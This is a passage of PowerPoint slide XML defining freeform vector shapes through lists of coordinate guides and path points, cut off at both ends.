                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64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9" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5935663" y="1444625"/>
                <a:ext cx="68262" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 191"/>
                  <a:gd name="T1" fmla="*/ 204 h 205"/>
                  <a:gd name="T2" fmla="*/ 0 w 191"/>
                  <a:gd name="T3" fmla="*/ 152 h 205"/>
                  <a:gd name="T4" fmla="*/ 58 w 191"/>
                  <a:gd name="T5" fmla="*/ 0 h 205"/>
                  <a:gd name="T6" fmla="*/ 190 w 191"/>
                  <a:gd name="T7" fmla="*/ 52 h 205"/>
                  <a:gd name="T8" fmla="*/ 127 w 191"/>
                  <a:gd name="T9" fmla="*/ 204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1" h="205">
                    <a:moveTo>
                      <a:pt x="127" y="204"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="204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0" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6094413" y="1331913"/>
                <a:ext cx="282575" cy="317500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 426 w 783"/>
                  <a:gd name="T1" fmla="*/ 614 h 883"/>
                  <a:gd name="T2" fmla="*/ 426 w 783"/>
                  <a:gd name="T3" fmla="*/ 614 h 883"/>
                  <a:gd name="T4" fmla="*/ 662 w 783"/>
                  <a:gd name="T5" fmla="*/ 162 h 883"/>
                  <a:gd name="T6" fmla="*/ 782 w 783"/>
                  <a:gd name="T7" fmla="*/ 225 h 883"/>
                  <a:gd name="T8" fmla="*/ 441 w 783"/>
                  <a:gd name="T9" fmla="*/ 882 h 883"/>
                  <a:gd name="T10" fmla="*/ 289 w 783"/>
                  <a:gd name="T11" fmla="*/ 803 h 883"/>
                  <a:gd name="T12" fmla="*/ 368 w 783"/>
                  <a:gd name="T13" fmla="*/ 257 h 883"/>
                  <a:gd name="T14" fmla="*/ 363 w 783"/>
                  <a:gd name="T15" fmla="*/ 257 h 883"/>
                  <a:gd name="T16" fmla="*/ 127 w 783"/>
                  <a:gd name="T17" fmla="*/ 719 h 883"/>
                  <a:gd name="T18" fmla="*/ 0 w 783"/>
                  <a:gd name="T19" fmla="*/ 656 h 883"/>
                  <a:gd name="T20" fmla="*/ 347 w 783"/>
                  <a:gd name="T21" fmla="*/ 0 h 883"/>
                  <a:gd name="T22" fmla="*/ 499 w 783"/>
                  <a:gd name="T23" fmla="*/ 78 h 883"/>
                  <a:gd name="T24" fmla="*/ 426 w 783"/>
                  <a:gd name="T25" fmla="*/ 614 h 8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83" h="883">
                    <a:moveTo>
                      <a:pt x="426" y="614"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="614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1" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6296025" y="1512888"/>
                <a:ext cx="188913" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 526"/>
                  <a:gd name="T1" fmla="*/ 305 h 579"/>
                  <a:gd name="T2" fmla="*/ 142 w 526"/>
                  <a:gd name="T3" fmla="*/ 347 h 579"/>
                  <a:gd name="T4" fmla="*/ 131 w 526"/>
                  <a:gd name="T5" fmla="*/ 389 h 579"/>
                  <a:gd name="T6" fmla="*/ 137 w 526"/>
                  <a:gd name="T7" fmla="*/ 426 h 579"/>
                  <a:gd name="T8" fmla="*/ 142 w 526"/>
                  <a:gd name="T9" fmla="*/ 441 h 579"/>
                  <a:gd name="T10" fmla="*/ 158 w 526"/>
                  <a:gd name="T11" fmla="*/ 452 h 579"/>
                  <a:gd name="T12" fmla="*/ 189 w 526"/>
                  <a:gd name="T13" fmla="*/ 463 h 579"/>
                  <a:gd name="T14" fmla="*/ 215 w 526"/>
                  <a:gd name="T15" fmla="*/ 457 h 579"/>
                  <a:gd name="T16" fmla="*/ 247 w 526"/>
                  <a:gd name="T17" fmla="*/ 441 h 579"/>
                  <a:gd name="T18" fmla="*/ 389 w 526"/>
                  <a:gd name="T19" fmla="*/ 473 h 579"/>
                  <a:gd name="T20" fmla="*/ 357 w 526"/>
                  <a:gd name="T21" fmla="*/ 510 h 579"/>
                  <a:gd name="T22" fmla="*/ 299 w 526"/>
                  <a:gd name="T23" fmla="*/ 557 h 579"/>
                  <a:gd name="T24" fmla="*/ 262 w 526"/>
                  <a:gd name="T25" fmla="*/ 573 h 579"/>
                  <a:gd name="T26" fmla="*/ 195 w 526"/>
                  <a:gd name="T27" fmla="*/ 573 h 579"/>
                  <a:gd name="T28" fmla="*/ 110 w 526"/>
                  <a:gd name="T29" fmla="*/ 536 h 579"/>
                  <a:gd name="T30" fmla="*/ 78 w 526"/>
                  <a:gd name="T31" fmla="*/ 515 h 579"/>
                  <a:gd name="T32" fmla="*/ 31 w 526"/>
                  <a:gd name="T33" fmla="*/ 473 h 579"/>
                  <a:gd name="T34" fmla="*/ 21 w 526"/>
                  <a:gd name="T35" fmla="*/ 447 h 579"/>
                  <a:gd name="T36" fmla="*/ 5 w 526"/>
                  <a:gd name="T37" fmla="*/ 405 h 579"/>
                  <a:gd name="T38" fmla="*/ 0 w 526"/>
                  <a:gd name="T39" fmla="*/ 357 h 579"/>
                  <a:gd name="T40" fmla="*/ 11 w 526"/>
                  <a:gd name="T41" fmla="*/ 310 h 579"/>
                  <a:gd name="T42" fmla="*/ 31 w 526"/>
                  <a:gd name="T43" fmla="*/ 263 h 579"/>
                  <a:gd name="T44" fmla="*/ 84 w 526"/>
                  <a:gd name="T45" fmla="*/ 169 h 579"/>
                  <a:gd name="T46" fmla="*/ 147 w 526"/>
                  <a:gd name="T47" fmla="*/ 79 h 579"/>
                  <a:gd name="T48" fmla="*/ 184 w 526"/>
                  <a:gd name="T49" fmla="*/ 48 h 579"/>
                  <a:gd name="T50" fmla="*/ 221 w 526"/>
                  <a:gd name="T51" fmla="*/ 22 h 579"/>
                  <a:gd name="T52" fmla="*/ 268 w 526"/>
                  <a:gd name="T53" fmla="*/ 6 h 579"/>
                  <a:gd name="T54" fmla="*/ 315 w 526"/>
                  <a:gd name="T55" fmla="*/ 0 h 579"/>
                  <a:gd name="T56" fmla="*/ 336 w 526"/>
                  <a:gd name="T57" fmla="*/ 6 h 579"/>
                  <a:gd name="T58" fmla="*/ 394 w 526"/>
                  <a:gd name="T59" fmla="*/ 22 h 579"/>
                  <a:gd name="T60" fmla="*/ 425 w 526"/>
                  <a:gd name="T61" fmla="*/ 42 h 579"/>
                  <a:gd name="T62" fmla="*/ 489 w 526"/>
                  <a:gd name="T63" fmla="*/ 95 h 579"/>
                  <a:gd name="T64" fmla="*/ 499 w 526"/>
                  <a:gd name="T65" fmla="*/ 111 h 579"/>
                  <a:gd name="T66" fmla="*/ 525 w 526"/>
                  <a:gd name="T67" fmla="*/ 195 h 579"/>
                  <a:gd name="T68" fmla="*/ 519 w 526"/>
                  <a:gd name="T69" fmla="*/ 236 h 579"/>
                  <a:gd name="T70" fmla="*/ 504 w 526"/>
                  <a:gd name="T71" fmla="*/ 289 h 579"/>
                  <a:gd name="T72" fmla="*/ 446 w 526"/>
                  <a:gd name="T73" fmla="*/ 389 h 579"/>
                  <a:gd name="T74" fmla="*/ 189 w 526"/>
                  <a:gd name="T75" fmla="*/ 268 h 579"/>
                  <a:gd name="T76" fmla="*/ 389 w 526"/>
                  <a:gd name="T77" fmla="*/ 221 h 579"/>
                  <a:gd name="T78" fmla="*/ 394 w 526"/>
                  <a:gd name="T79" fmla="*/ 200 h 579"/>
                  <a:gd name="T80" fmla="*/ 399 w 526"/>
                  <a:gd name="T81" fmla="*/ 179 h 579"/>
                  <a:gd name="T82" fmla="*/ 394 w 526"/>
                  <a:gd name="T83" fmla="*/ 147 h 579"/>
                  <a:gd name="T84" fmla="*/ 383 w 526"/>
                  <a:gd name="T85" fmla="*/ 132 h 579"/>
                  <a:gd name="T86" fmla="*/ 368 w 526"/>
                  <a:gd name="T87" fmla="*/ 121 h 579"/>
                  <a:gd name="T88" fmla="*/ 331 w 526"/>
                  <a:gd name="T89" fmla="*/ 111 h 579"/>
                  <a:gd name="T90" fmla="*/ 315 w 526"/>
                  <a:gd name="T91" fmla="*/ 116 h 579"/>
                  <a:gd name="T92" fmla="*/ 299 w 526"/>
                  <a:gd name="T93" fmla="*/ 121 h 579"/>
                  <a:gd name="T94" fmla="*/ 273 w 526"/>
                  <a:gd name="T95" fmla="*/ 147 h 579"/>
                  <a:gd name="T96" fmla="*/ 236 w 526"/>
                  <a:gd name="T97" fmla="*/ 195 h 579"/>
                  <a:gd name="T98" fmla="*/ 357 w 526"/>
                  <a:gd name="T99" fmla="*/ 273 h 5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26" h="579">
                    <a:moveTo>
                      <a:pt x="168" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="389" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="221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2" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6442075" y="1550988"/>
                <a:ext cx="177800" cy="258762"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 494 w 495"/>
                  <a:gd name="T1" fmla="*/ 83 h 719"/>
                  <a:gd name="T2" fmla="*/ 405 w 495"/>
                  <a:gd name="T3" fmla="*/ 215 h 719"/>
                  <a:gd name="T4" fmla="*/ 473 w 495"/>
                  <a:gd name="T5" fmla="*/ 262 h 719"/>
                  <a:gd name="T6" fmla="*/ 415 w 495"/>
                  <a:gd name="T7" fmla="*/ 341 h 719"/>
                  <a:gd name="T8" fmla="*/ 347 w 495"/>
                  <a:gd name="T9" fmla="*/ 294 h 719"/>
                  <a:gd name="T10" fmla="*/ 174 w 495"/>
                  <a:gd name="T11" fmla="*/ 541 h 719"/>
                  <a:gd name="T12" fmla="*/ 174 w 495"/>
                  <a:gd name="T13" fmla="*/ 541 h 719"/>
                  <a:gd name="T14" fmla="*/ 158 w 495"/>
                  <a:gd name="T15" fmla="*/ 567 h 719"/>
                  <a:gd name="T16" fmla="*/ 153 w 495"/>
                  <a:gd name="T17" fmla="*/ 582 h 719"/>
                  <a:gd name="T18" fmla="*/ 153 w 495"/>
                  <a:gd name="T19" fmla="*/ 582 h 719"/>
                  <a:gd name="T20" fmla="*/ 158 w 495"/>
                  <a:gd name="T21" fmla="*/ 603 h 719"/>
                  <a:gd name="T22" fmla="*/ 179 w 495"/>
                  <a:gd name="T23" fmla="*/ 619 h 719"/>
                  <a:gd name="T24" fmla="*/ 179 w 495"/>
                  <a:gd name="T25" fmla="*/ 619 h 719"/>
                  <a:gd name="T26" fmla="*/ 195 w 495"/>
                  <a:gd name="T27" fmla="*/ 630 h 719"/>
                  <a:gd name="T28" fmla="*/ 195 w 495"/>
                  <a:gd name="T29" fmla="*/ 630 h 719"/>
                  <a:gd name="T30" fmla="*/ 205 w 495"/>
                  <a:gd name="T31" fmla="*/ 635 h 719"/>
                  <a:gd name="T32" fmla="*/ 147 w 495"/>
                  <a:gd name="T33" fmla="*/ 718 h 719"/>
                  <a:gd name="T34" fmla="*/ 147 w 495"/>
                  <a:gd name="T35" fmla="*/ 718 h 719"/>
                  <a:gd name="T36" fmla="*/ 110 w 495"/>
                  <a:gd name="T37" fmla="*/ 692 h 719"/>
                  <a:gd name="T38" fmla="*/ 110 w 495"/>
                  <a:gd name="T39" fmla="*/ 692 h 719"/>
                  <a:gd name="T40" fmla="*/ 74 w 495"/>
                  <a:gd name="T41" fmla="*/ 666 h 719"/>
                  <a:gd name="T42" fmla="*/ 74 w 495"/>
                  <a:gd name="T43" fmla="*/ 666 h 719"/>
                  <a:gd name="T44" fmla="*/ 43 w 495"/>
                  <a:gd name="T45" fmla="*/ 645 h 719"/>
                  <a:gd name="T46" fmla="*/ 22 w 495"/>
                  <a:gd name="T47" fmla="*/ 624 h 719"/>
                  <a:gd name="T48" fmla="*/ 22 w 495"/>
                  <a:gd name="T49" fmla="*/ 624 h 719"/>
                  <a:gd name="T50" fmla="*/ 6 w 495"/>
                  <a:gd name="T51" fmla="*/ 603 h 719"/>
                  <a:gd name="T52" fmla="*/ 0 w 495"/>
                  <a:gd name="T53" fmla="*/ 582 h 719"/>
                  <a:gd name="T54" fmla="*/ 0 w 495"/>
                  <a:gd name="T55" fmla="*/ 582 h 719"/>
                  <a:gd name="T56" fmla="*/ 0 w 495"/>
                  <a:gd name="T57" fmla="*/ 556 h 719"/>
                  <a:gd name="T58" fmla="*/ 11 w 495"/>
                  <a:gd name="T59" fmla="*/ 535 h 719"/>
                  <a:gd name="T60" fmla="*/ 11 w 495"/>
                  <a:gd name="T61" fmla="*/ 535 h 719"/>
                  <a:gd name="T62" fmla="*/ 48 w 495"/>
                  <a:gd name="T63" fmla="*/ 472 h 719"/>
                  <a:gd name="T64" fmla="*/ 231 w 495"/>
                  <a:gd name="T65" fmla="*/ 210 h 719"/>
                  <a:gd name="T66" fmla="*/ 169 w 495"/>
                  <a:gd name="T67" fmla="*/ 167 h 719"/>
                  <a:gd name="T68" fmla="*/ 227 w 495"/>
                  <a:gd name="T69" fmla="*/ 89 h 719"/>
                  <a:gd name="T70" fmla="*/ 284 w 495"/>
                  <a:gd name="T71" fmla="*/ 130 h 719"/>
                  <a:gd name="T72" fmla="*/ 378 w 495"/>
                  <a:gd name="T73" fmla="*/ 0 h 719"/>
                  <a:gd name="T74" fmla="*/ 494 w 495"/>
                  <a:gd name="T75" fmla="*/ 83 h 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95" h="719">
                    <a:moveTo>
                      <a:pt x="494" y="83"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="405" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="83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3" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6534150" y="1652588"/>
                <a:ext cx="293688" cy="292100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 814"/>
                  <a:gd name="T1" fmla="*/ 89 h 810"/>
                  <a:gd name="T2" fmla="*/ 168 w 814"/>
                  <a:gd name="T3" fmla="*/ 441 h 810"/>
                  <a:gd name="T4" fmla="*/ 173 w 814"/>
                  <a:gd name="T5" fmla="*/ 441 h 810"/>
                  <a:gd name="T6" fmla="*/ 477 w 814"/>
                  <a:gd name="T7" fmla="*/ 178 h 810"/>
                  <a:gd name="T8" fmla="*/ 598 w 814"/>
                  <a:gd name="T9" fmla="*/ 278 h 810"/>
                  <a:gd name="T10" fmla="*/ 404 w 814"/>
                  <a:gd name="T11" fmla="*/ 630 h 810"/>
                  <a:gd name="T12" fmla="*/ 404 w 814"/>
                  <a:gd name="T13" fmla="*/ 630 h 810"/>
                  <a:gd name="T14" fmla="*/ 708 w 814"/>
                  <a:gd name="T15" fmla="*/ 368 h 810"/>
                  <a:gd name="T16" fmla="*/ 813 w 814"/>
                  <a:gd name="T17" fmla="*/ 457 h 810"/>
                  <a:gd name="T18" fmla="*/ 367 w 814"/>
                  <a:gd name="T19" fmla="*/ 809 h 810"/>
                  <a:gd name="T20" fmla="*/ 241 w 814"/>
                  <a:gd name="T21" fmla="*/ 709 h 810"/>
